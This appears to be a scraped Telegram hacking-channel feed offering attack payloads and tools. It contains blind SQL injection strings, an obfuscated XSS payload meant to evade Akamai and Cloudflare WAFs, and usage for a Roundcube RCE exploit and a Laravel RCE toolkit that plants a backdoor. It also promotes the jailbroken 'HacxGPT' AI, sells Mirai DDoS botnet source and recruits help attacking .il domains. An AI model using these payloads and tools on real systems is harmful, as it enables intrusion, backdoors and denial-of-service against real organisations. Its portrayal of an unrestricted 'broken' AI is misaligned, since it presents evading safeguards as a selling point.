Blind SQL Injection
Tips:
1. Gather all URLs from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z
#BugBounty #Payload #SQLi
T.me/BugCod3BOT
T.me/BugCod3
Useful Wireshark Filters
#WireShark #Tips
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="security"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
How to use Gobuster to brute-force directories!
$ gobuster dir -u <target-URL> -w <wordlist>
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
#GoBuster #Tips #Tools
WAF bypass for Akamai and Cloudflare
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
#WAF #Akamai #Cloudflare
HacxGPT
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
Features:
▪️ Powerful AI Conversations: all questions will be answered in good flow.
▪️ Broken AI: Can do anything you want!!
Installation:
sudo apt-get update && sudo apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py
#Ai #Hackers #Tools
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
Vulnerable Versions:
▪️ 1.5.0 - 1.5.9
▪️ 1.6.0 - 1.6.10
Requirements:
▪️ PHP 7.0 or higher
▪️ cURL extension enabled
▪️ Target running a vulnerable version of Roundcube
Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"
#CVE #PHP #RemoteCode
Hi, friends who want to help us in attacking the .il domain address can provide their type of help in the bot below and contact us.
T.me/BugCod3BOT
Networking Commands
#Network #Command
BadMod auto exploit tool
CMS auto detect and exploit.
Installation:
chmod +x INSTALL
./INSTALL
#PHP #Auto #Exploitation
Trape (stable) v2.0
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but it evolves with the aim of helping government organizations, companies and researchers to track cybercriminals.
Some benefits:
▪️ LOCATOR OPTIMIZATION
▪️ APPROACH
▪️ REST API
▪️ PROCESS HOOKS
▪️ PUBLIC NETWORK TUNNEL
▪️ CLICK ATTACK TO GET CREDENTIALS
▪️ NETWORK
▪️ PROFILE
Usage:
cd trape
pip3 install -r requirements.txt
python3 trape.py -h
# Example: python3 trape.py --url http://example.com --port 8080
#Python #Osint #Security #Tracking #Tools
GhostRecon
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.
What Recon Tool Does:
▪️ Find All Subdomains
▪️ Find All URLs ASN
▪️ Fetching IP
▪️ Identify Live IPs
▪️ Detect CDN/WAF
To Buy: T.me/BugCod3BOT
Mirai DDoS source with botnet and all tools and peripherals for sale, urgent sale
To Buy: T.me/BugCod3BOT
RFC-compliant payloads for email and phone number fields
#RFC #Payload
Burp Suite MCP Server Extension with scan and crawl features
This is an extended MCP Server Extension for the Burp Suite proxy, with scan and crawl features, based on the original.
For build instructions, follow the original README as provided by PortSwigger below; for direct use, load the provided extension in your Burp proxy.
Features:
▪️ Connect Burp Suite to AI clients through MCP
▪️ Automatic installation for Claude Desktop
▪️ Comes with packaged Stdio MCP proxy server
Usage:
▪️ Install the extension in Burp Suite
▪️ Configure your Burp MCP server in the extension settings
▪️ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
▪️ Interact with Burp through your client!
Installation:
Prerequisites
▪️ Java
▪️ Jar Command
cd burp-mcp
./gradlew embedProxyJar
# Open Burp Suite
# Access the Extensions Tab
# Add the Extension
#Burp #Suite #Extension
Revelar - Origin Reveal PRO
Overview:
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.
Features:
▪️ Detects CDN providers automatically.
▪️ Collects DNS records (A, AAAA, MX, Reverse DNS).
▪️ Extracts SSL Subject Alternative Names (SANs).
▪️ Integrates with optional external tools (subfinder, amass, dnsx, httpx, nuclei).
▪️ Filters CDN IP ranges to isolate real origin candidates.
▪️ Active verification engine
Installation:
Install via go install:
go install github.com/MRvirusIR/Revelar@latest
or
cd Revelar
Usage:
./Revelar -d example.com # For Run
./Revelar -h
#Revelar #CDN #Finder #RealIP #Discovery #Tool
If this post gets support and a lot of reactions, we will prepare and create many more cool tools for you to use and enjoy.
Laravel RCE Exploitation Toolkit
Purpose: Exploits a Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URL.
#Exploit #laravel #Rce #Rcr_Exploit
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platform.
Summary
Affected Versions
XWiki 5.3-milestone-2 up to < 15.10.11
XWiki 16.0.0-rc-1 up to < 16.4.1
CVSS v3.1 Score: 9.8 (Critical)
#Rce #Exploit